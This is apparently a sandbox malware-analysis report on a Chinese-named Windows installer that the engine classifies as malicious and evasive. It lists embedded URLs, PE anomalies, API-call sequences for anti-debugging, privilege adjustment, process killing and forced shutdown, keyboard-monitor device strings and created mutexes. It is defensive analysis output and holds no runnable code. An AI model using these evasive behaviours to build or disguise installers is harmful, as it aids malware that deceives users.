Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drString found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drString found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F4AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002980000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1677364257.0000000000A51000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000000.1700682526.000000000028D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F4AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002980000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1677364257.0000000000A51000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000000.1700682526.000000000028D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.1.drStatic PE information: section name: .=~
Source: hrsw.vbc.5.drStatic PE information: section name: .=~
Source: update.vac.5.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C633886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C633886
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7B5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,5_2_6C7B5120
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C633C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C633C62
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C633D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C633D62
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7B5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,5_2_6C7B5D60
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C633D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C633D18
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C6339CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C6339CF
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C633A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C633A6A
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C631950: CreateFileA,DeviceIoControl,CloseHandle,5_2_6C631950
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C634754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,5_2_6C634754
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C6347545_2_6C634754
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C644A275_2_6C644A27
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7B18805_2_6C7B1880
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7B6A435_2_6C7B6A43
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C816CE05_2_6C816CE0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C863D505_2_6C863D50
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C869E805_2_6C869E80
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C802EC95_2_6C802EC9
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7E8EA15_2_6C7E8EA1
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C85E8105_2_6C85E810
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7E89725_2_6C7E8972
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C8699F05_2_6C8699F0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C87A9305_2_6C87A930
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C861AA05_2_6C861AA0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C874AA05_2_6C874AA0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C85DAD05_2_6C85DAD0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C85FA505_2_6C85FA50
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7F0BCA5_2_6C7F0BCA
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C800B665_2_6C800B66
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C80540A5_2_6C80540A
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C8625805_2_6C862580
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C86F5C05_2_6C86F5C0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C8696E05_2_6C8696E0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C8897005_2_6C889700
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7EC7CF5_2_6C7EC7CF
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C8600205_2_6C860020
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C8737505_2_6C873750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CB81EC9_2_00CB81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C8E00A9_2_00C8E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF81C09_2_00CF81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF22E09_2_00CF22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D082409_2_00D08240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D0C3C09_2_00D0C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D123009_2_00D12300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D004C89_2_00D004C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CDE49F9_2_00CDE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF25F09_2_00CF25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CE66D09_2_00CE66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CEA6A09_2_00CEA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CE86509_2_00CE8650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D0E9909_2_00D0E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CC09439_2_00CC0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CEC9509_2_00CEC950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF2A809_2_00CF2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CCAB119_2_00CCAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF6CE09_2_00CF6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CE8C209_2_00CE8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D04EA09_2_00D04EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D00E009_2_00D00E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CFD0899_2_00CFD089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CD10AC9_2_00CD10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D091C09_2_00D091C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CED1D09_2_00CED1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CEB1809_2_00CEB180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF51809_2_00CF5180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CDB1219_2_00CDB121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D011209_2_00D01120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D0D2C09_2_00D0D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D072009_2_00D07200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C753CF9_2_00C753CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D0F3C09_2_00D0F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C9B3E49_2_00C9B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CD53F39_2_00CD53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CFF3A09_2_00CFF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D054D09_2_00D054D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CBD4969_2_00CBD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D0D4709_2_00D0D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CE74109_2_00CE7410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CFF4209_2_00CFF420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D0F5999_2_00D0F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D015509_2_00D01550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C715729_2_00C71572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D1351A9_2_00D1351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CEF5009_2_00CEF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D035309_2_00D03530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CFD6A09_2_00CFD6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CC96529_2_00CC9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D136019_2_00D13601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C797CA9_2_00C797CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D077C09_2_00D077C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C897669_2_00C89766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C9F8E09_2_00C9F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D0D9E09_2_00D0D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CEF9109_2_00CEF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C8BAC99_2_00C8BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CC3AEF9_2_00CC3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF7AF09_2_00CF7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C71AA19_2_00C71AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C8BC929_2_00C8BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF7C509_2_00CF7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CEFDF09_2_00CEFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF5E809_2_00CF5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF5F809_2_00CF5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: String function: 6C886F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: String function: 6C7E9240 appears 31 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00D0FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00C71E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00C728E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F7AA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000000.1673638280.00000000004E9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.11.drBinary string: \Device\TfSysMon
Source: tProtect.dll.11.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal96.evad.winEXE@147/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7B5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,5_2_6C7B5D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C79313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_00C79313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C83D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_00C83D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C79252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,9_2_00C79252
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7B5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,5_2_6C7B5240
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-7402T.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2316:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6944:120:WilError_03
